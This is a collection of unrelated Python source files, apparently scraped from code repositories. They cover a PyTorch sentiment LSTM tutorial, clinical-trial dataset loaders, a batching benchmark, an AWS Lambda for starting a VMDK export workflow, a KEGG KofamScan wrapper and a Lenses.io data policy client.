optimizer.zero_grad()
text, text_lengths = batch.text
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, batch.label)
acc = binary_accuracy(predictions, batch.label)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
epoch_acc += acc.item()
return epoch_loss / len(iterator), epoch_acc / len(iterator)
def evaluate(model, iterator, criterion):
epoch_loss, epoch_acc = 0, 0
model.eval() # Set to evaluation mode
with torch.no_grad(): # Don't track gradients
for batch in iterator:
text, text_lengths = batch.text
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, batch.label)
acc = binary_accuracy(predictions, batch.label)
epoch_loss += loss.item()
epoch_acc += acc.item()
return epoch_loss / len(iterator), epoch_acc / len(iterator)
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
if __name__ == "__main__":
# MAKE DETERMINISTIC =======================================================
SEED = 1234
torch.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
# LOAD DATA ================================================================
# Spacy is good for tokenisation in other languages
TEXT = data.Field(tokenize = 'spacy', include_lengths = True)
LABEL = data.LabelField(dtype = torch.float)
# If slow, use this instead:
# def tokenize(s):
# return s.split(' ')
# TEXT = data.Field(tokenize=tokenize, include_lengths = True)
# Test-valid-train split
train_data, test_data = datasets.IMDB.splits(TEXT, LABEL)
train_data, valid_data = train_data.split(random_state = random.seed(SEED))
# Visualise
example = next(iter(test_data))
example.label
example.text
# Note: Using glove embeddings (~900mb)
TEXT.build_vocab(
test_data,
max_size = 25000,
vectors = "glove.6B.100d",
unk_init = torch.Tensor.normal_ # how to initialize unseen words not in glove
)
LABEL.build_vocab(test_data)
# Data iterators
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
train_iterator, valid_iterator, test_iterator = data.BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = 64,
sort_within_batch = True,
device = device)
# MODEL ====================================================================
PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token] # Specifies index when word is missing
model = BidirectionalLSTM(input_dim=len(TEXT.vocab),
embedding_dim=100,
hidden_dim=256,
output_dim=1,
n_layers=2, # To make LSTM deep
bidirectional=True,
dropout=0.5,
pad_idx=PAD_IDX)
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
count_parameters(model) # 4,810,857 (wow!)
# Copy embeddings to model
pretrained_embeddings = TEXT.vocab.vectors
model.embedding.weight.data.copy_(pretrained_embeddings)
# Zero out <UNK> and <PAD> tokens
    UNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]
    EMBEDDING_DIM = 100  # must match the embedding_dim used to build the model above
    model.embedding.weight.data[UNK_IDX] = torch.zeros(EMBEDDING_DIM)
    model.embedding.weight.data[PAD_IDX] = torch.zeros(EMBEDDING_DIM)
# TRAIN ====================================================================
optimizer = optim.Adam(model.parameters())
criterion = nn.BCEWithLogitsLoss()
model = model.to(device)
criterion = criterion.to(device)
N_EPOCHS = 5
best_valid_loss = float('inf')
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss, train_acc = train(model, train_iterator, optimizer, criterion)
valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), 'tut2-model.pt')
print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')
print(f'\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')
# WHEN DONE.. ==============================================================
model.load_state_dict(torch.load('tut2-model.pt'))
test_loss, test_acc = evaluate(model, test_iterator, criterion)
print(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')
# TRY WITH USER INPUT ======================================================
import spacy
nlp = spacy.load('en')
def predict_sentiment(model, sentence):
model.eval()
tokenized = [tok.text for tok in nlp.tokenizer(sentence)]
indexed = [TEXT.vocab.stoi[t] for t in tokenized]
length = [len(indexed)]
tensor = torch.LongTensor(indexed).to(device)
tensor = tensor.unsqueeze(1)
length_tensor = torch.LongTensor(length)
prediction = torch.sigmoid(model(tensor, length_tensor))
return prediction.item()
predict_sentiment(model, "This film is great")
| 3.1875 | 3 |
auton_survival/datasets_biolincc.py | mononitogoswami/auton-survival | 0 | 12789343 |
import pandas as pd
import numpy as np
def _encode_cols_index(df):
columns = df.columns
# Convert Objects to Strings
for col in columns:
if df[col].dtype == 'O':
df.loc[:, col] = df[col].values.astype(str)
# If Index is Object, covert to String
if df.index.dtype == 'O':
df.index = df.index.values.astype(str)
return df
def load_support(location=''):
data = pd.read_csv(location+"support2.csv")
drop_cols = ['death', 'd.time']
outcomes = data.copy()
outcomes['event'] = data['death']
outcomes['time'] = data['d.time']
outcomes = outcomes[['event', 'time']]
cat_feats = ['sex', 'dzgroup', 'dzclass', 'income', 'race', 'ca']
num_feats = ['age', 'num.co', 'meanbp', 'wblc', 'hrt', 'resp',
'temp', 'pafi', 'alb', 'bili', 'crea', 'sod', 'ph',
'glucose', 'bun', 'urine', 'adlp', 'adls']
return outcomes, data[cat_feats+num_feats]
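# Illustrative sketch (not part of the original module): loading the SUPPORT
# study, assuming support2.csv has already been downloaded into `location`.
def _example_load_support(location=''):
    outcomes, features = load_support(location)
    # outcomes has the columns ['event', 'time']; features holds the covariates
    print(outcomes.shape, features.shape)
    return outcomes, features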
def load_actg(location=''):
data = pd.read_csv(location+"ACTG175.csv", index_col='pidnum')
drop_cols = ['cens', 'days', 'arms']
outcomes = data.copy()
outcomes['event'] = data['cens']
outcomes['time'] = data['days']
outcomes = outcomes[['event', 'time']]
features = data.drop(columns=drop_cols, inplace=False)
columns = list(set(features.columns)-set(['Unnamed: 0', 'arms']))
return outcomes, features[columns]
def _load_generic_biolincc_dataset(outcome_tbl, time_col, event_col, features, id_col,
visit_col=None, baseline_visit=None, location=''):
if not isinstance(baseline_visit, (tuple, set, list)):
baseline_visit = [baseline_visit]
# List of all features to extract
all_features = []
for feature in features:
all_features+=features[feature]
all_features = list(set(all_features)) # Only take the unqiue columns
if '.sas' in outcome_tbl: outcomes = pd.read_sas(location+outcome_tbl, index=id_col)
elif '.csv' in outcome_tbl: outcomes = pd.read_csv(location+outcome_tbl, index_col=id_col, encoding='latin-1')
else: raise NotImplementedError()
outcomes = outcomes[[time_col, event_col]]
dataset = outcomes.copy()
dataset.columns = ['time', 'event']
for feature in features:
if '.sas' in outcome_tbl: table = pd.read_sas(location+feature, index=id_col)
elif '.csv' in outcome_tbl: table = pd.read_csv(location+feature, index_col=id_col)
else: raise NotImplementedError()
if (visit_col is not None) and (visit_col in table.columns):
mask = np.zeros(len(table[visit_col])).astype('bool')
for baseline_visit_ in baseline_visit:
mask = mask | (table[visit_col]==baseline_visit_)
table = table[mask]
table = table[features[feature]]
print(table.shape)
dataset = dataset.join(table)
outcomes = dataset[['time', 'event']]
features = dataset[all_features]
outcomes = _encode_cols_index(outcomes)
features = _encode_cols_index(features)
return outcomes, features
def load_crash2(endpoint=None, features=None, location=''):
if features is None:
print("No Features Specified!! using default demographic features.")
features = {'CRASH-2_unblindedcodelist.csv': ['t_code'],
'CRASH-2_data_1.csv': ['iage', 'isex', 'ninjurytime',
'iinjurytype', 'isbp', 'irr',
'icc', 'ihr', 'igcseye', 'igcsmotor',
'igcsverbal', 'igcs', 'trandomised',
'ddeath', 'ddischarge']}
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='CRASH-2_data_1.csv',
time_col='trandomised',
event_col='ddeath',
features=features,
id_col='ientryid',
location=location+'CRASH2/')
time_rand = pd.to_datetime(outcomes['time'], format='%d/%m/%Y')
time_disch = pd.to_datetime(features['ddischarge'], format='%d/%m/%Y')
time_death = pd.to_datetime(features['ddeath'], format='%d/%m/%Y')
features.drop(columns=['ddischarge', 'ddeath', 'trandomised'], inplace=True)
outcomes['event'] = (~np.isnan(time_death)).astype('int')
time = np.empty_like(time_rand)
time[~np.isnan(time_disch)] = time_disch[~np.isnan(time_disch)]
time[~np.isnan(time_death)] = time_death[~np.isnan(time_death)]
outcomes['time'] = (time - time_rand).dt.days
features = features.loc[outcomes['time'].values.astype(int)>=0]
outcomes = outcomes.loc[outcomes['time'].values.astype(int)>=0]
return outcomes, features
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if event[-3:] == 'dth': time = 'deathfu'
else: time = event + 'fu'
def load_bari2d(endpoint=None, features=None, location=''):
if features is None:
print("No Features Specified!! using default demographic features.")
features = {'bari2d_bl.sas7bdat': ['strata', 'weight',
'bmi', 'age',
'sex', 'race'],
}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if event[-3:] == 'dth': time = 'deathfu'
else: time = event + 'fu'
return _load_generic_biolincc_dataset(outcome_tbl='bari2d_endpts.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='id',
location=location+'BARI2D/data/')
def load_topcat(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
features = {'t003.sas7bdat': ['age_entry', 'GENDER',
'RACE_WHITE', 'RACE_BLACK',
'RACE_ASIAN', 'RACE_OTHER',],
't005.sas7bdat': ['DM'],
't011.sas7bdat': ['country'],
'outcomes.sas7bdat':['drug'],
}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if 'death' in endpoint:
time = 'time_death'
else:
time = 'time_' + event
return _load_generic_biolincc_dataset(outcome_tbl='outcomes.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='ID',
location=location+'TOPCAT/datasets/')
def load_allhat(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
categorical_features = ['RZGROUP', 'RACE', 'HISPANIC', 'ETHNIC',
'SEX', 'ESTROGEN', 'BLMEDS', 'MISTROKE',
'HXCABG', 'STDEPR', 'OASCVD', 'DIABETES',
'HDLLT35', 'LVHECG', 'WALL25', 'LCHD',
'CURSMOKE', 'ASPIRIN', 'LLT', 'RACE2',
'BLMEDS2', 'GEOREGN']
numeric_features = ['AGE', 'BLWGT', 'BLHGT', 'BLBMI', 'BV2SBP',
'BV2DBP', 'EDUCAT', 'APOTAS', 'BLGFR']
features = {'hyp_vsc.sas7bdat': categorical_features + numeric_features}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'DEATH'
# Set the outcome variable
event = endpoint
if 'CANCER' in endpoint: time = 'DYCANC'
elif 'EP_CHD' in endpoint: time = 'DYCHD'
else: time = 'DY' + event
full_location = location+'ALLHAT/ALLHAT_v2016a/DATA/Summary/'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='hyp_vsc.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='STUDYID',
location=full_location)
outcomes['event'] = 1-(outcomes['event']-1)
if 'ESTROGEN' in features.columns:
assert 'SEX' in features.columns, "`SEX` needs to be included if using `ESTROGEN`"
        features.loc[features['SEX'] == 1.0, 'ESTROGEN'] = 4.0
        features.loc[features['ESTROGEN'].isna(), 'ESTROGEN'] = 3.0
return outcomes, features
def load_proud(endpoint=None, features=None, location=''):
raise NotImplementedError()
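    # PROUD loading is not implemented; everything below this raise is an
    # unreachable placeholder copied from load_allhat.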
if features is None:
print("No Features Specified!! using default baseline features.")
categorical_features = ['RZGROUP', 'RACE', 'HISPANIC', 'ETHNIC',
'SEX', 'ESTROGEN', 'BLMEDS', 'MISTROKE',
'HXCABG', 'STDEPR', 'OASCVD', 'DIABETES',
'HDLLT35', 'LVHECG', 'WALL25', 'LCHD',
'CURSMOKE', 'ASPIRIN', 'LLT', 'RACE2',
'BLMEDS2', 'GEOREGN']
numeric_features = ['AGE', 'BLWGT', 'BLHGT', 'BLBMI', 'BV2SBP',
'BV2DBP', 'EDUCAT', 'APOTAS', 'BLGFR']
features = {'hyp_vsc.sas7bdat': categorical_features + numeric_features}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'DEATH'
# Set the outcome variable
event = endpoint
if 'CANCER' in endpoint:
time = 'DYCANC'
else:
time = 'DY' + event
full_location = location+'ALLHAT/ALLHAT_v2016a/DATA/Summary/'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='hyp_vsc.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='STUDYID',
location=full_location)
return outcomes, features
def load_aimhigh():
raise NotImplementedError()
def load_amis():
raise NotImplementedError()
def load_bari():
raise NotImplementedError()
def load_best():
raise NotImplementedError()
def load_clever():
raise NotImplementedError()
def load_oat():
raise NotImplementedError()
def load_peace():
raise NotImplementedError()
def load_sprint_pop():
raise NotImplementedError()
def load_stich():
raise NotImplementedError()
def load_accord(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
features = {
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/accord_key.sas7bdat': ['female', 'baseline_age', 'arm',
'cvd_hx_baseline', 'raceclass',
'treatment'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/bloodpressure.sas7bdat': ['sbp', 'dbp', 'hr'],
'ACCORD/4-Data Sets - CRFs/4a-CRF Data Sets/f01_inclusionexclusionsummary.sas7bdat': ['x1diab', 'x2mi',
'x2stroke', 'x2angina','cabg','ptci','cvdhist','orevasc','x2hbac11','x2hbac9','x3malb','x3lvh','x3sten','x4llmeds',
'x4gender','x4hdlf', 'x4hdlm','x4bpmeds','x4notmed','x4smoke','x4bmi'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/lipids.sas7bdat': ['chol', 'trig', 'vldl', 'ldl', 'hdl'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/otherlabs.sas7bdat': ['fpg', 'alt', 'cpk',
'potassium', 'screat', 'gfr',
'ualb', 'ucreat', 'uacr'],
}
# outcomes = {'ACCORD_Private/Data Sets - Analysis 201604/CVDOutcomes_201604.sas7bdat':['censor_po','type_po',
# 'fuyrs_po', 'fuyrs_po7p', 'censor_tm', 'type_tm',
# 'fuyrs_tm', 'fuyrs_tm7p', 'censor_cm', 'type_nmi', 'fuyrs_nmi7p', 'censor_nst',
# 'type_nst', 'fuyrs_nst', 'fuyrs_nst7p', 'censor_tst', 'fuyrs_tst', 'fuyrs_tst7p'
# 'censor_chf', 'fuyrs_chf', 'censor_ex', 'type_ex', 'fuyrs_ex', 'fuyrs_ex7p',
# 'censor_maj', 'type_maj', 'fuyrs_maj7p']
# }
if endpoint is None:
print("No Endpoint specified, using primary study endpoint.")
endpoint = 'po'
# Set the outcome variable,
event = 'censor_'+endpoint
time = 'fuyrs_'+endpoint
outcome_tbl = 'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/cvdoutcomes.sas7bdat'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl=outcome_tbl,
time_col=time,
event_col=event,
features=features,
id_col='MaskID',
location=location,
visit_col='Visit',
baseline_visit=(b'BLR', b'S01'))
outcomes['event'] = 1-outcomes['event']
outcomes['time'] = outcomes['time']
outcomes = outcomes.loc[outcomes['time']>1.0]
features = features.loc[outcomes.index]
outcomes['time'] = outcomes['time']-1
return outcomes, features
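# Example usage sketch: the loaders above expect the raw BioLINCC study folders
# (e.g. 'TOPCAT/datasets/', 'BARI2D/data/') to live under `location`; the path
# below is only a placeholder.
if __name__ == '__main__':
    data_root = '/path/to/biolincc/'
    outcomes, features = load_topcat(endpoint='death', location=data_root)
    print(outcomes.head())
    print(features.shape)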
| 2.921875 | 3 |
batching_benchmark.py | rdhara/modulo | 8 | 12789344 | <reponame>rdhara/modulo
import time
import random
import pandas
import seaborn as sns
import numpy as np
from matplotlib import pyplot as plt
class Module():
def __init__(self, proc_time=None):
self.proc_time = proc_time
def run(self):
time.sleep(self.proc_time)
class ModuleA(Module):
def __init__(self, proc_time=1e-4):
super(ModuleA, self).__init__(proc_time)
class ModuleB(Module):
def __init__(self, proc_time=2e-4):
super(ModuleB, self).__init__(proc_time)
class ModuleC(Module):
def __init__(self, proc_time=3e-4):
super(ModuleC, self).__init__(proc_time)
class ModuleD(Module):
def __init__(self, proc_time=4e-4):
super(ModuleD, self).__init__(proc_time)
class ModuleE(Module):
def __init__(self, proc_time=5e-4):
super(ModuleE, self).__init__(proc_time)
def generate_task(N, sigma, k=64, max_l=5, mode='homogeneous'):
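    """Generate N module layouts over the alphabet `sigma`.

    Each layout is a space-separated string of 2 to max_l-1 module names.
    'homogeneous' repeats one random layout for every block of k tasks
    (so N must be a multiple of k); 'heterogeneous' samples every layout
    independently.
    """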
T = []
if mode == 'homogeneous':
assert(N % k == 0), 'N must be a multiple of batch size'
for _ in range(N // k):
layout = [' '.join(random.choice(sigma) for _ in range(random.randrange(2, max_l)))]
T.extend(layout*k)
elif mode == 'heterogeneous':
for _ in range(N):
T.append(' '.join(random.choice(sigma) for _ in range(random.randrange(2, max_l))))
else:
raise ValueError('Invalid mode {}'.format(mode))
return T
class HomogeneousBatching():
def __init__(self, T, M, k, batch_cost=0.0005):
self.T = T
self.M = M
self.k = k
self.batch_cost = batch_cost
def train(self):
t0 = time.time()
N = len(self.T)
for b in range(N // self.k):
            # one representative layout per homogeneous block of k identical tasks
            layout = list(map(lambda x: self.M[x], self.T[b * self.k].split()))
for mod in layout:
mod.run()
time.sleep(self.batch_cost)
dt = time.time() - t0
print('ELAPSED TIME: {:.2f} s'.format(dt))
return dt
class NoBatching():
def __init__(self, T, M):
self.T = T
self.M = M
    def train(self):
        t0 = time.time()
        # self.T is a list of layout strings such as 'a b c'; run every module
        # of every task one at a time, with no batching across tasks.
        for layout in self.T:
            for mod in layout.split():
                self.M[mod].run()
        dt = time.time() - t0
        print('ELAPSED TIME: {:.2f} s'.format(dt))
        return dt
class HeterogeneousBatching():
def __init__(self, T, M, k, batch_cost=5e-4):
self.T = [t.split() for t in T]
self.M = M
self.k = k
self.batch_cost = batch_cost
def train(self):
t0 = time.time()
N = len(self.T)
H = {(-1, j) for j in range(N)}
T_done = set()
T_prog = [0 for _ in range(N)]
while len(T_done) < N:
P = {m: [] for m in self.M.keys()}
P_full = {m: False for m in self.M.keys()}
while_ctr = 0
while not sum(P_full.values()) and while_ctr < 1:
while_ctr = 0
for t in range(len(self.T)):
if t not in T_done and (T_prog[t] - 1, t) in H:
mod = self.T[t][T_prog[t]]
curr_queue = len(P[mod])
if curr_queue < self.k:
while_ctr -= 1
P[mod].append(self.M[mod])
H.remove((T_prog[t] - 1, t))
T_prog[t] += 1
H.add((T_prog[t] - 1, t))
if T_prog[t] == len(self.T[t]):
T_done.add(t)
if curr_queue + 1 == self.k:
P_full[mod] = True
while_ctr += 1
for m in P.keys():
self.M[m].run()
time.sleep(self.batch_cost)
dt = time.time() - t0
print('ELAPSED TIME: {:.2f} s'.format(dt))
return dt
M = {
'a': ModuleA(),
'b': ModuleB(),
'c': ModuleC(),
'd': ModuleD(),
'e': ModuleE()
}
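# Quick illustrative run of HomogeneousBatching, which the experiment loop below
# does not exercise; the sizes (N=256, k=64) are arbitrary choices kept small so
# this check finishes in well under a second.
_demo_tasks = generate_task(256, 'abcde', k=64, max_l=5, mode='homogeneous')
HomogeneousBatching(_demo_tasks, M, k=64).train()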
res = []
ns = [256, 1024, 4096, 16384, 65536, 262144]
ks = [16, 32, 64, 128]
ls = [5, 10, 15, 20]
for n in ns:
for k in ks:
for l in ls:
dataset = generate_task(n, 'abcde', k, l, mode='heterogeneous')
htb = HeterogeneousBatching(dataset, M, k)
nb = NoBatching(dataset, M)
res.append({
'n': n,
'k': k,
'l': l,
'htb_time': htb.train(),
'nb_time': nb.train()
})
df = pandas.DataFrame(res)
# df = pandas.read_csv('../batching.csv')
df['log_htb_time'] = np.log10(df['htb_time'])
df['log_nb_time'] = np.log10(df['nb_time'])
df['log_n'] = np.log10(df['n'])
sns.set_style('whitegrid')
sns.set_context('paper', rc={'axes.titlesize':22, 'legend.fontsize':'xx-large', 'axes.labelsize': 16})
sns.set_palette('muted', color_codes=True)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle('Experiment Set 1: Fixing k = 64', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
    ax.set_title(r'Maximum layout length $\ell_{max} = $' + str(ls[i-1]))
df_sub = df[(df['k'] == 64) & (df['l'] == ls[i-1])]
ax.plot(df_sub['log_n'], df_sub['log_htb_time'], c='r', marker='o', label='HTB')
ax.plot(df_sub['log_n'], df_sub['log_nb_time'], c='b', marker='o', label='NB')
ax.set_xlabel('Log training size (log N)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/kfixed.pdf', dpi=200)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle('Experiment Set 2: Fixing N = 65536', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
ax.set_title('Batch size k = {}'.format(ks[i-1]))
df_sub = df[(df['n'] == 65536) & (df['k'] == ks[i-1])]
ax.plot(df_sub['l'], df_sub['log_htb_time'], c='r', marker='o', label='HTB')
ax.plot(df_sub['l'], df_sub['log_nb_time'], c='b', marker='o', label='NB')
    ax.set_xlabel(r'Max layout length ($\ell_{max}$)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/Nfixed.pdf', dpi=200)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle(r'Experiment Set 3: Fixing $\ell_{max}$ = 15', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
ax.set_title('Training examples N = {}'.format(ns[i+1]))
df_sub = df[(df['l'] == 10) & (df['n'] == ns[i+1])]
ax.plot(df_sub['k'], df_sub['log_htb_time'], color='r', marker='o', label='HTB')
ax.plot(df_sub['k'], df_sub['log_nb_time'], color='b', marker='o', label='NB')
ax.set_xlabel('Batch size (k)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/ellfixed.pdf', dpi=200) | 2.234375 | 2 |
stacks/vmdkexport/resources/vmexport/vmdknotify/vmdknotify_function.py | aws-samples/ec2-imagebuilder-vmdk-export | 0 | 12789345 | ##################################################
## Notify VMDK export request
##################################################
import os
import boto3
from botocore.exceptions import ClientError
import json
import logging
def lambda_handler(event, context):
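    """Start the VMDK export state machine for a completed Image Builder image.

    Triggered by an SNS notification whose `Message` is the image build version
    ARN; the ARN is returned unchanged and no new execution is started while one
    is already RUNNING.
    """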
# set logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# print the event details
logger.debug(json.dumps(event, indent=2))
# get state machine arn from env vars
state_machine_arn = os.environ['STATE_MACHINE_ARN']
image_build_version_arn = event["Records"][0]["Sns"]["Message"]
stepfunctions_client = boto3.client('stepfunctions')
response = stepfunctions_client.list_executions(
stateMachineArn=state_machine_arn,
statusFilter='RUNNING',
maxResults=1000
)
if len(response['executions']) > 0:
return image_build_version_arn
response = stepfunctions_client.start_execution(
stateMachineArn=state_machine_arn,
input="{\"image_build_version_arn\" : \"" + image_build_version_arn + "\"}"
)
return image_build_version_arn | 1.898438 | 2 |
analysis_script/make_time_chart.py | nahimilega/subreddit-analyzer | 1 | 12789346 | <reponame>nahimilega/subreddit-analyzer<filename>analysis_script/make_time_chart.py
import datetime
import random
import matplotlib.pyplot as plt
import pymongo
from datetime import datetime
from collections import Counter
# Make chart of busy hours
# All charts in graph folder
def intilise_database():
"""
    Initialise the database and make a collection instance

    Returns:
        pymongo object of the collection
"""
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb=myclient['subreddit']
maintable = mydb["posts2"]
return maintable
db = intilise_database()
# collect the posting hour (UTC) of every post
ll = []
for post in db.find():
timestamp = post['time']
dt = datetime.fromtimestamp(timestamp)
ll.append(dt.hour)
cc = Counter(ll)
x = []
y = []
for i in range(24):
x.append(str(i)+":00" )
y.append(cc[i])
plt.xlabel('Time (Hours) in UTC')
plt.ylabel('No of posts')
plt.plot(x,y)
# beautify the x-labels
plt.gcf().autofmt_xdate()
plt.show() | 3.140625 | 3 |
jakomics/kegg.py | jeffkimbrel/jakomics | 0 | 12789347 | <gh_stars>0
import uuid
import os
import subprocess
import re
import pandas as pd
from jakomics import colors
from jakomics.utilities import system_call
class KOFAM:
def __init__(self, line, t_scale=1.0):
parsed = re.split('\t', line)
self.parsed = parsed
self.gene = parsed[1]
self.KO = parsed[2]
self.threshold = parsed[3]
self.score = float(parsed[4])
self.evalue = float(parsed[5])
self.description = parsed[6]
if len(self.threshold) == 0:
self.threshold = 0
self.warning = f"WARNING: {self.KO} does not have a KO threshold. All hits >0 will be included."
if self.score >= float(self.threshold) * float(t_scale):
self.threshold = float(self.threshold)
self.passed = True
else:
self.passed = False
def view(self):
return [self.gene, self.KO, self.threshold, self.score, self.evalue, self.description]
def result(self):
return {'gene': self.gene,
'annotation': self.KO,
'score': self.score,
'evalue': self.evalue}
def __str__(self):
return "<JAKomics KOFAM class>"
def run_kofam(faa_path, hal_path, ko_list, cpus=1, t_scale=1, echo=False, run=True):
temp_dir = 'KO_' + uuid.uuid4().hex
command = f'exec_annotation --no-report-unannotated -k {ko_list} --tmp-dir {temp_dir} {faa_path} -T {t_scale} --cpu {int(cpus)} --profile {hal_path} -f detail-tsv ; rm -fR {temp_dir}'
kofam_out = system_call(command, return_type="out", echo=echo, run=run)
hits = []
for line in kofam_out:
if len(line) > 0 and not line.lstrip().startswith('#'):
hits.append(KOFAM(line, t_scale))
return hits
def parse_kofam_hits(run_kofam_out):
'''
Returns a dictionary of passed results with KO as key and list of kofam classes as value
'''
parsed = {}
for hit in run_kofam_out:
if hit.passed:
# print(db['DB_NAME'], genome.short_name, hit.view(), sep="\t")
if hit.KO in parsed:
parsed[hit.KO].append(hit)
else:
parsed[hit.KO] = [hit]
return parsed
def kofam_to_df(run_kofam_out):
    columns = ['LOCUS_TAG', 'KO', 'SCORE', 'THRESHOLD', 'EVALUE', 'DESCRIPTION']
    rows = []
    for hit in run_kofam_out:
        if hit.passed:
            rows.append({'LOCUS_TAG': hit.gene,
                         'KO': hit.KO,
                         'SCORE': hit.score,
                         'THRESHOLD': hit.threshold,
                         'EVALUE': hit.evalue,
                         'DESCRIPTION': hit.description})
    # build the frame in one step; row-wise DataFrame.append is deprecated in recent pandas
    results = pd.DataFrame(rows, columns=columns)
    return results
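# Example usage sketch: assumes KofamScan's `exec_annotation` is on PATH and
# that the FASTA, .hal profile list and ko_list paths below (placeholders)
# point at real files.
if __name__ == '__main__':
    hits = run_kofam('proteins.faa', 'profiles.hal', 'ko_list', cpus=4)
    passed = parse_kofam_hits(hits)   # {KO: [KOFAM hits]} that passed their threshold
    df = kofam_to_df(hits)            # the same passing hits as a DataFrame
    print(df.head())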
| 2.3125 | 2 |
lensesio/data/policy.py | rsaggino/lenses-python | 13 | 12789348 | from lensesio.core.endpoints import getEndpoints
from lensesio.core.exec_action import exec_request
class Policy:
def __init__(self, verify_cert=True):
getEndpoints.__init__(self, "policyEndpoints")
self.verify_cert=verify_cert
self.lenses_policies_endpoint = self.url + self.lensesPoliciesEndpoint
self.policy_headers = {
'Content-Type': 'application/json',
'Accept': 'text/plain application/json',
'x-kafka-lenses-token': self.token}
def ViewPolicy(self):
self.viewPolicy = exec_request(
__METHOD="get",
__EXPECTED="json",
__URL=self.lenses_policies_endpoint,
__HEADERS=self.policy_headers,
__VERIFY=self.verify_cert
)
return self.viewPolicy
def SetPolicy(self, name, obfuscation, impactType, category, fields):
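        """Create a data policy; `fields` may be a single field name or a list
        of field names and is normalised to a list before the request is sent."""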
if type(fields) is not list:
fields = [fields]
params = dict(
name=name,
obfuscation=obfuscation,
impactType=impactType,
category=category,
fields=fields
)
self.setPolicy = exec_request(
__METHOD="post",
__EXPECTED="text",
__URL=self.lenses_policies_endpoint,
__HEADERS=self.policy_headers,
__DATA=params,
__VERIFY=self.verify_cert
)
return self.setPolicy
def DelPolicy(self, name):
policies = self.ViewPolicy()
for e in policies:
if e['name'] == name:
policy_id = e['id']
break
else:
policy_id = None
if policy_id:
_REQ = self.lenses_policies_endpoint + '/' + policy_id
self.delPolicy = exec_request(
__METHOD="delete",
__EXPECTED="text",
__URL=_REQ,
__HEADERS=self.policy_headers,
__VERIFY=self.verify_cert
)
else:
return "No policy with name %s" % name
return self.delPolicy
| 2.140625 | 2 |
modelling/train_scripts/train_meta.py | TheisFerre/Thesis-paper | 0 | 12789349 | <reponame>TheisFerre/Thesis-paper
from modelling.models import BaselineGATLSTM, Edgeconvmodel, GATLSTM, Encoder, Decoder, STGNNModel, BaselineGNNLSTM
import torch
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import numpy as np
import dill
from data_processing.process_dataset import Dataset
